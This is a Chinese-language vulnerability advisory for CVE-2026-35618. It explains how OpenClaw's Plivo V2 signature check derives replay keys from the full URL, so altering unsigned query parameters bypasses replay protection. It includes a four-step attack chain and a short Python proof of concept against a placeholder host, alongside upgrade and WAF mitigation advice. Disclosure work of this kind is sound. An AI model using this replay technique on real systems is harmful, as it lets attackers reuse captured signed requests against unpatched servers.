IPBUF安全漏洞报告
English
CVE-2026-35618 CVSS 6.5 中危

CVE-2026-35618 OpenClaw重放身份漏洞

披露日期: 2026-04-09
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35618
漏洞类型
重放攻击
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

重放攻击身份验证绕过OpenClawCVE-2026-35618Plivo

漏洞概述

OpenClaw 2026.3.23之前版本存在重放身份漏洞。该漏洞出现在Plivo V2签名验证过程中,由于验证路径错误地从包含查询字符串的完整URL派生重放密钥,而非使用规范化的基础URL,导致安全机制失效。攻击者可利用此缺陷,通过修改查询参数的方式绕过重放保护,利用未签名的查询变更伪造新的验证请求密钥,进而威胁系统安全性。

技术细节

该漏洞的核心原理在于OpenClaw在实现Plivo V2签名验证时,未能正确隔离签名计算与重放保护密钥生成的上下文。规范的安全实践应当基于规范化的基础URL(即排除查询参数的固定路径)来生成重放密钥,以确保同一逻辑请求只能被处理一次。然而,受影响版本的代码逻辑错误地将完整的HTTP请求URL(包含查询字符串)作为了派生重放密钥的唯一依据。攻击者利用这一缺陷,无需伪造合法的签名,只需对已捕获的合法请求添加、删除或修改未签名的查询参数。由于查询参数的变化改变了输入URL,进而生成了全新的重放密钥,导致系统的防重放机制误认为这是一个新的合法请求。这种“查询参数变体”攻击使得攻击者能够绕过时效性检查,重复利用有效的凭证进行恶意操作。

攻击链分析

STEP 1
侦察
识别使用OpenClaw且开启了Plivo V2签名验证的目标系统。
STEP 2
截获
攻击者截获或通过嗅探获取一个合法的、已签名的请求URL。
STEP 3
修改
在保持原签名参数不变的情况下,向URL的查询字符串中添加、删除或修改任意参数。
STEP 4
利用
将修改后的请求发送给服务器。由于重放密钥基于完整URL计算,服务器将其判定为新请求,绕过重放保护。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target vulnerable endpoint example target_url = "http://vulnerable-host/api/plivo/callback" # Step 1: Original signed request parameters (Captured by attacker) original_params = { "signature": "valid_generated_signature", "auth_id": "auth123", "call_uuid": "call_abc" } print("[+] Sending original request to capture valid signature context...") # response = requests.get(target_url, params=original_params) # Step 2: Exploit the Replay Identity Vulnerability # The vulnerability allows bypassing replay protection by modifying query parameters. # The replay key is derived from the full URL, so changing params creates a new key. exploit_params = original_params.copy() # Adding an arbitrary parameter changes the replay key but passes signature check # because the verification logic uses the full URL including query strings. exploit_params["bypass_param"] = "random_value_for_new_key" print("[+] Sending modified request to bypass replay protection...") print(f"[+] Exploit URL: {target_url}?{'&'.join([f'{k}={v}' for k,v in exploit_params.items()])}") # response = requests.get(target_url, params=exploit_params) # If vulnerable, the server accepts this as a new, valid request.

影响范围

OpenClaw < 2026.3.23

防御指南

临时缓解措施
建议立即升级到OpenClaw 2026.3.23或更高版本以修复此漏洞。如果无法立即升级,应在Web应用防火墙(WAF)层面实施严格的URL规范化规则,拦截对已知API端点的异常查询参数修改,或暂时禁用受影响的功能模块直至完成更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表